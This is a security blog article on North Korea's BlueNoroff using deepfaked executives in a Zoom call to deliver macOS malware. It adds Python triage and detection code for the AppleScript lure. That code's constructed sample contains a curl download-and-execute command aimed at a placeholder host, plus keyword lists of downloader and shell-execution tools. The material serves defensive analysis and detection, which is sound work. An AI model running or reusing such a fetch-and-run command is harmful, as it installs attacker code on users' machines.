Paubox blog: HIPAA compliant email - easy setup, no portals or passcodes

North Korean hackers use deepfakes in Zoom calls to target Mac users

Written by Farah Amod | July 08, 2025

A North Korean hacking group used AI-generated video impersonations in a Zoom meeting to trick an employee into installing macOS malware.

 

What happened

On June 11, 2025, cybersecurity researchers at Huntress uncovered a new attack from the North Korean-linked group BlueNoroff, known for cryptocurrency-related cybercrime. In the incident, a tech firm employee was lured into a Zoom call where deepfake videos of company executives were used to build trust. During the meeting, the victim was persuaded to install what was claimed to be a Zoom microphone extension but was actually a malicious AppleScript file that triggered a multi-stage malware infection on their macOS device.

 

Going deeper

The attack began with a Telegram message from someone posing as an external professional. The attacker then shared a Calendly link that resolved to a fake Zoom meeting domain. On the call, the deepfaked executives instructed the employee to download and run a file named zoom_sdk_support.scpt, supposedly to fix a microphone problem. The script opened a genuine Zoom SDK web page so the activity looked legitimate, while a command embedded in the same script fetched a second-stage payload from a spoofed domain.
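The lure described above is a compiled AppleScript whose visible behaviour (open a real web page) hides a shell command that downloads the next stage. The following is an added example, not code from the article or from Huntress: a small static triage routine that runs over the decompiled source of a .scpt file (on macOS, `osadecompile file.scpt` produces that text) and reports the indicators a responder would look for. The sample script and every URL, domain and path in it are constructed placeholders, not the real campaign's artifacts.

```python
"""Static triage of a decompiled AppleScript lure.

Added example, not the article's or Huntress's code. The sample source
below is constructed to mirror the behaviour described in the article:
open a legitimate-looking page, then fetch and run a second stage.
All URLs, hosts and paths are placeholders.
"""
import re
from urllib.parse import urlparse

# Shell utilities that pull remote content; one of these inside a
# `do shell script` in a "support" script is the core signal.
DOWNLOADERS = {"curl", "wget", "nscurl"}
# Fragments that show the fetched content is executed, not just saved.
EXEC_MARKERS = ("| sh", "| bash", "| zsh", "bash -c", "sh -c", "chmod +x")

SHELL_RE = re.compile(r'do shell script\s+"((?:[^"\\]|\\.)*)"')
OPEN_RE = re.compile(r'open location\s+"([^"]+)"')
URL_RE = re.compile(r'https?://[^\s"\'<>|)&;]+')


def _hosts(text):
    """Set of hostnames from every URL found in `text`."""
    hosts = set()
    for url in URL_RE.findall(text):
        host = urlparse(url).hostname
        if host:
            hosts.add(host)
    return hosts


def _uses_downloader(cmd):
    # Compare the basename of each token so "/usr/bin/curl" matches too.
    return any(tok.rsplit("/", 1)[-1] in DOWNLOADERS for tok in cmd.split())


def triage_applescript(source):
    """Return the indicators found in decompiled AppleScript source."""
    opened = OPEN_RE.findall(source)
    commands = [m.group(1).replace('\\"', '"') for m in SHELL_RE.finditer(source)]
    flags = []

    def note(flag):
        if flag not in flags:
            flags.append(flag)

    download_hosts = set()
    for cmd in commands:
        if _uses_downloader(cmd):
            note("shell command fetches remote content")
            download_hosts |= _hosts(cmd)
        if any(marker in cmd for marker in EXEC_MARKERS):
            note("shell command executes what it fetched")
    if opened and commands:
        note("opens a web page while running shell commands (decoy pattern)")
    # The decoy page and the payload come from different places.
    if download_hosts - _hosts("\n".join(opened)):
        note("download host differs from the page shown to the user")

    return {
        "opened_urls": opened,
        "shell_commands": commands,
        "download_hosts": download_hosts,
        "flags": flags,
        "suspicious": bool(flags),
    }


# Constructed sample: mimics the lure the article describes, not the real file.
SAMPLE = '''-- zoom_sdk_support (constructed sample, placeholder hosts)
open location "https://zoom.example/docs/sdk"
do shell script "curl -fsSL https://zoom-support.example/update -o /tmp/zoom_helper && chmod +x /tmp/zoom_helper && /tmp/zoom_helper"
'''

if __name__ == "__main__":
    for key, value in triage_applescript(SAMPLE).items():
        print(f"{key}: {value}")
```

Treat this as a first-pass triage, not a verdict: a script that only opens a page is benign under these rules, and an attacker can split the download across several `do shell script` calls or base64-encode the command, so the decompiled text should still be read in full.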

The malware campaign included several custom-built tools tailored for macOS.

  • Telegram 2: A Nim-based implant disguised as a Telegram updater, run on a schedule to keep persistence.
  • Root Troy V4: A Go-based backdoor with remote code execution and download capabilities.
  • InjectWithDyld: A loader for encrypted implants, designed to operate stealthily and erase its tracks.
  • XScreen (keyboardd): A surveillance tool that logs keystrokes, screen activity, and clipboard content.
  • CryptoBot (airmond): A cryptocurrency-focused infostealer targeting over 20 wallet platforms.

 

BlueNoroff’s malware chain also included measures to bypass detection: payloads carried valid developer signatures, and the script silently installed Rosetta 2 so that x86-64 payloads could run on Apple Silicon Macs.
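Two of the behaviours in this chain are visible in ordinary endpoint telemetry: an AppleScript run from a user-writable location, and a Rosetta install that nobody was asked to approve. The following is an added example, not code from the article or from Huntress: two detection rules run over process-execution events. The JSON-lines event schema and its field names (`process`, `args`, `parent`, `tty`) are assumptions standing in for whatever an EDR or a unified-log export actually provides, and the sample events are constructed with placeholder hostnames and paths. The `softwareupdate --install-rosetta --agree-to-license` command line is the real macOS invocation for a non-interactive Rosetta install.

```python
"""Detection rules for two behaviours the article attributes to this chain.

Added example, not the article's or Huntress's code. The event format is a
constructed JSON-lines schema standing in for EDR process telemetry; field
names are assumptions. Sample events are constructed with placeholder hosts.
"""
import json

# Locations an unprivileged user can write to; a .scpt launched from here
# is far more likely to be a lure than an admin's deployed script.
USER_WRITABLE = ("/Users/", "/tmp/", "/private/tmp/", "/var/folders/")


def rule_applescript_from_user_writable_path(ev):
    if ev["process"] != "osascript":
        return None
    for arg in ev["args"][1:]:
        if arg.endswith(".scpt") and arg.startswith(USER_WRITABLE):
            return f"osascript ran {arg} from a user-writable path"
    return None


def rule_silent_rosetta_install(ev):
    args = ev["args"]
    if ev["process"] != "softwareupdate" or "--install-rosetta" not in args:
        return None
    # An interactive install prompts for the licence. "--agree-to-license"
    # combined with an AppleScript parent or no controlling terminal means
    # the user never saw that prompt. Tune the parent list to the install
    # tooling your fleet legitimately uses.
    silent = "--agree-to-license" in args
    scripted = ev.get("parent") == "osascript" or ev.get("tty") is None
    if silent and scripted:
        return f"non-interactive Rosetta install by parent {ev.get('parent')}"
    return None


RULES = {
    "applescript_from_user_writable_path": rule_applescript_from_user_writable_path,
    "silent_rosetta_install": rule_silent_rosetta_install,
}


def detect(jsonl):
    """Run every rule over each JSON-lines event; return the alerts raised."""
    alerts = []
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        for name, rule in RULES.items():
            reason = rule(ev)
            if reason:
                alerts.append({"rule": name, "ts": ev["ts"],
                               "host": ev["host"], "reason": reason})
    return alerts


# Constructed sample telemetry (placeholder hosts, users and paths).
# Events 1 and 2 follow the sequence the article describes; 3 is an admin
# installing Rosetta from a terminal; 4 is a harmless inline osascript.
EVENTS = """\
{"ts": "2025-06-11T14:02:10Z", "host": "mac-01", "user": "jdoe", "process": "osascript", "args": ["osascript", "/Users/jdoe/Downloads/zoom_sdk_support.scpt"], "parent": "Finder", "tty": null}
{"ts": "2025-06-11T14:02:12Z", "host": "mac-01", "user": "jdoe", "process": "softwareupdate", "args": ["softwareupdate", "--install-rosetta", "--agree-to-license"], "parent": "osascript", "tty": null}
{"ts": "2025-06-11T09:15:00Z", "host": "mac-02", "user": "admin", "process": "softwareupdate", "args": ["softwareupdate", "--install-rosetta", "--agree-to-license"], "parent": "zsh", "tty": "ttys001"}
{"ts": "2025-06-11T14:03:00Z", "host": "mac-01", "user": "jdoe", "process": "osascript", "args": ["osascript", "-e", "beep"], "parent": "zsh", "tty": "ttys002"}
"""

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The Rosetta rule is deliberately narrow: on an Intel Mac the command does nothing, and on Apple Silicon a legitimate install usually comes from an MDM agent or an interactive terminal, so the alert should be correlated with the preceding osascript event rather than paged on alone.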

 

What was said

Huntress researchers warned that Mac users are increasingly being targeted, especially as macOS becomes more common in enterprise settings. The use of deepfakes adds a new level of sophistication to social engineering tactics, blending credible visuals with trusted meeting platforms to deliver malicious code.

 

FAQs

What is BlueNoroff, and how is it linked to North Korea?

BlueNoroff is an advanced persistent threat (APT) group believed to operate under North Korea’s Reconnaissance General Bureau. It’s part of the larger Lazarus Group umbrella and is known for financial cybercrime, especially cryptocurrency theft.

 

How do deepfakes enhance the effectiveness of social engineering attacks?

Deepfakes can convincingly mimic trusted individuals like executives or partners in real-time video calls, making fraudulent requests or instructions seem legitimate and harder to question.

 

Why are AppleScript files effective for delivering Mac malware?

AppleScript is the automation language built into macOS, and its do shell script command runs arbitrary shell commands with the privileges of the user who ran the script. A .scpt file can therefore open a legitimate page or dialog in the foreground while quietly downloading and executing a payload, which lets attackers present malware as a harmless helper or support tool.

 

What makes this attack different from traditional phishing campaigns?

Unlike typical email phishing, this attack combined interactive video deepfakes, real-time deception, and advanced payload delivery tailored to the Mac environment, making it both targeted and technically layered.